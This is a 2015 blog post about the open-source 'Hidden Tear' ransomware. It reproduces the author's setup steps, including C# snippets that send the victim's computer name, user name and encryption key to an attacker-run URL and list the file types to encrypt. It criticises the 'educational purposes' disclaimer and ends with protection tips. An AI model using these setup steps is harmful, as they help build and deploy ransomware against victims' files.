Wednesday, August 19, 2015

Skiddie can create ransomware using this source

Don't panic! You heard it right. You need to earn money demanding people for their data here is the way to become a cyber criminal.

A Turkish security researcher named Utku Sen has posted a fully functional Ransomware code on open source code sharing website GitHub.

The Ransomware dubbed Hidden Tear, uses AES Encryption to lock down files before displaying a ransom message warning to get users to pay up.
The currently undetectable version of ransomware can be modified and implemented accordingly, as it contains every feature a cybercriminal can expect from modern malware.

Sen describes his Ransomware as "a ransomware-like file crypter sample which can be modified for specific purposes." This means even script kiddies can now develop their own Ransomware to threaten people.

The "Hidden Tear" Ransomware package consists of four files namely:

Hidden Tear Ransomware is capable of:
  • Using AES algorithm to encrypt files
  • Sending encryption key to a server
  • Encrypting files and decrypting them using a decrypter program with the encryption key
  • Creating a text file in Desktop with given message
  • Small file size (12 KB)
  • Evading detection by all standard anti-virus programs

How to Setup your Custom Ransomware Using Hidden Tear?

Sen has specified usage details as well, he says:

1. You need to have a web server that supports scripting languages such as PHP or Python. Then change the below-mentioned line with your URL. (Better use HTTPS connection in order to avoid eavesdropping):

string targetURL = "";

2. The script should write the GET parameter to a text file. Sending process running in SendPassword() function:

string info = computerName + "-" + userName + " " + password;
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);

3. Target file extensions can also be change. Default list:

var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};

For Educational Purpose... REALLY!

Wait! Sen has something more to say, listening to which you might think...REALLY!!

With the whole project "Hidden Tear," there's an attached legal warning that says:
"While this may be helpful for some, there are significant risks. The 'Hidden Tear' may be used only for 'Educational Purposes.' Do not use it as a Ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent."
Somebody should ask him… Why instigating people to commit a crime? One could imagine such "Educational Purposes" as there's a big chance of Ransomware to pop up in recent attacks.

How to Protect Yourself from Ransomware Threat?

Utilize the Ransomware removal kit that could help you deal with various variants of ransomware as well as help you unlock encrypted files without paying off to the cyber crooks.
However, there are some important steps that should be considered to protect yourself from Ransomware threats.
  • Always keep regular backups of your important data.
  • Make sure you run an active anti-virus security suite of tools on your system.
  • Do not open email attachments from unknown sources.
  • Most importantly, always browse the Internet safely.

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.